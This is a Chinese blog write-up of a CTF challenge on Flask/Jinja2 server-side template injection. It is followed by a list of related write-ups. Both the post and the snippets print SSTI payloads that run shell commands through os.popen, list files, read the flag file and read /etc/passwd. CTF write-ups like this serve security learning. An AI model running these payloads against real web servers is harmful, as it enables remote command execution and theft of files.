攻防世界 web进阶区 Web_python_template_injection

最新推荐文章于 2024-07-06 11:42:12 发布
最新推荐文章于 2024-07-06 11:42:12 发布
阅读量1k 收藏 2
点赞数 1
分类专栏: ctf web题 文章标签: flask web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_51395584/article/details/125329906
版权

攻防世界 web进阶区 Web_python_template_injection

通过观察题目,这是一个和python的flask模板漏洞有关的题,打开链接
在这里插入图片描述
直接尝试使用flask模板的漏洞试试,构造的payload为:/{{2*3}}
通过下图的观察,确实存在这样的漏洞。
在这里插入图片描述
然后查看config文件,测试配置文件是否有被禁用,可以看到,配置文件包并没有被禁用。
构造的payload为:/{{config}}
在这里插入图片描述

config文件没有被禁用,接下来就简单了,直接查看服务器的本地文件有哪些,构造的的payload为:
/{{ config.__class__.__init__.__globals__['os'].popen('ls').read() }}
此处我解释下上面的这个payload:

class:用来查看变量所属的类,根据前面的变量形式可以得到其所属的类。
init 初始化类,返回的类型是function
globals[] 使用方式是 函数名.__globals__获取function所处空间下可使用的module、方法以及所有变量。
os.popen() 方法用于从一个命令打开一个管道。

得到如下信息,看到了fl4g,该文件中应该就保存了flag的相关信息
在这里插入图片描述
读取fl4g的相关内容信息,直接得到flag
构造的payload为:/{{ config.__class__.__init__.__globals__['os'].popen('cat fl4g').read() }}
在这里插入图片描述
最终的flag为:ctf{f22b6844-5169-4054-b2a0-d95b9361cb57}
文章仅限于个人对该题的理解,可能有些地方不对,希望网友发现错误之后能够及时评论给予改正。非常的感谢大家。

小皮hai
关注
  • 1
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
攻防世界--WEB进阶--Web_python_template_injection
m0_46267075的博客
05-28 1170
好难啊
攻防世界 web高手进阶 9分题 Web_python_flask_sql_injection
闵行小鱼塘
10-12 1038
继续ctf的旅程,开始攻防世界web高手进阶的9分题,本文是Web_python_flask_sql_injection的writeup
攻防世界Web_python_template_injectionweb进阶
my_name_is_sy的博客
06-29 2006
考点为模板漏洞及其利用。
攻防世界 Web_python_template_injectionflask模版注入)
最新发布
weixin_73399382的博客
07-06 1299
通过调用__class__.__mro__,可以获取该类的方法解析顺序(Method Resolution Order,MRO),它是一个元组,按照查找方法时的顺序列出了对象所属类及其父类。解析:"".__class__.__mro__[2].__subclasses__()方法返回的是可用类(classes),而不是对象(objects)。综上所述,"".__class__.__mro__[2].__subclasses__()方法返回的是可用类(classes)SSTI与这个方法密不可分。
攻防世界Web_python_template_injection
weixin_52268949的博客
02-08 900
Web_python_template_injection 根据题目意思有点像python的ssti模板注入 我们来测试一下 果真存在那么我们就用ssti的基本方法了 我们先来看看全局变量 我们先来寻找一下基类 http://111.200.241.244:62377/{{''.__class__.__mro__}} 在这里发现了object类 寻找<type ‘object’>类的所有子类中可用的引用类 http://111.200.241.244:62377/{{''.__cla
攻防世界-web Web_python_template_injection
m0_48108919的博客
02-11 3354
提示python模板注入 随便输入个/test目录查看,提示not found,并且把我们的输入test进行了输出,可以尝试在这个位置进行注入 1.判断模板引擎: 找到收藏已久的模板注入图 首先从${7*7}开始测试:并没有执行 继续测试{{7*7}}:执行成功,输出了49 因为Twig是php的模板,所有可以确定模板为Jinja2 2.直接百度搜索Jinja2模板注入漏洞 参考:https://blog.csdn.net/qq_36374896/arti...
攻防世界】十四 --- Web_python_template_injection --- SSTI
qq_43168364的博客
12-27 434
题目 — Web_python_template_injection 考点:SSTI(服务器模板注入) 一、知识点 1. 何为模板注入 模板引擎可以让(网站)程序实现 界面 与 数据 分离,业务代码 与 逻辑代码 的分离,这大大提升了开发效率,良好的设计也使得代码重用变得更加容易。 但是模板引擎也拓宽了我们的攻击面。注入到模板中的代码可能会引发 RCE 或者 XSS 2. flask基础 (1)路由 from flask import flask @app.route('/index/'
攻防世界CTF Web_python_template_injection
cadandme的博客
02-15 3680
记录模块注入学习过程 题目:Web_python_template_injection提醒是模块注入 在Jinja2模板引擎中,{{}}是变量包裹标识符。{{}}并不仅仅可以传递变量,还可以执行一些简单的表达式。 模块注入测试: 网址输入“{{1*21}}”页面显示21,说面存在“SSTI” 在其他大佬的博客中收集的相关知识: SSTI也是获取了一个输入,然后再后端的渲染处理上进行了语句的拼接,然后执行。当然还是和sql注入有所不同的,SSTI利用的是现在的网站模板引擎(下面会提到),主要针对pyt
攻防世界web_python_template_injection
03-16
攻防世界中的web_python_template_injection是一种Web应用程序漏洞,它允许攻击者通过注入恶意代码来执行任意操作。这种漏洞通常出现在使用Python模板引擎的Web应用程序中,攻击者可以通过注入Python代码来执行任意...
攻防世界Web_python_template_injection
2302_79800344的博客
04-01 1029
【代码】【攻防世界Web_python_template_injection
攻防世界-web-Web_python_template_injection
wuh2333的博客
06-16 2348
攻防世界python模板注入
攻防世界】十二、Web_python_template_injection
Hi~ 土拨鼠
09-16 1094
步骤 打开所给场景,根据所给提示是python的模板注入 尝试一下漏洞是否存在:payload:/{{1+1}} 发现{{}}中的表达式被执行,构造命令执行payload:{{''.__class__.__mro__[2].__subclasses__()[71].__init__.__globals__['os'].popen('ls').read()}} 发现flag,将上述payload中的ls改为cat fl4g即可获得目标:{{''.__class__.__mro__[2].__subcl.
攻防世界WEB---Web_python_template_injection
Red Rapefruit
07-24 593
有关python模板注入漏洞的学习
web python template injection_攻防世界WEB高手进阶python_template_injection
weixin_39705193的博客
12-10 128
python模板注入看了一堆文章,也不是看的很明白,反而把题目做出来了大概思路如下简单探测返回说明服务器执行了{{}}里面这一段代码利用{{ config.items() }}可以查看服务器的配置信息读取passwd信息{{ [].__class__.__base__.__subclasses__()[40]('/etc/passwd').read() }}执行成功Python3代码执行下面这一段...
攻防世界--Web_python_template_injection
m0_67467924的博客
05-29 296
查看文件内容:''.__class__.__mro__[2].__subclasses__()[71].__init__.__globals__['os'].popen('cat fl4g').read()4.构造payload查看当前目录文件,''.__class__.__mro__[2].__subclasses__()[71].__init__.__globals__['os'].popen('ls').read()1.获取基本类:''.__class__.__mro__运行成功,证明存在模板注入。
Web_python_template_injection_攻防世界
u014794949
11-06 257
提示python模板注入,7*7变成49,确定存在模板注入 {{''.__class__.__mro__[2].__subclasses__()}} 构造payload {{''.__class__.__mro__[2].__subclasses__()[71].__init__.__globals__['os'].listdir('.')}} {{''.__class__.__mro__[2].__subclasses__()[40]('fl4g').read()}} 魔术方法 __cl
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值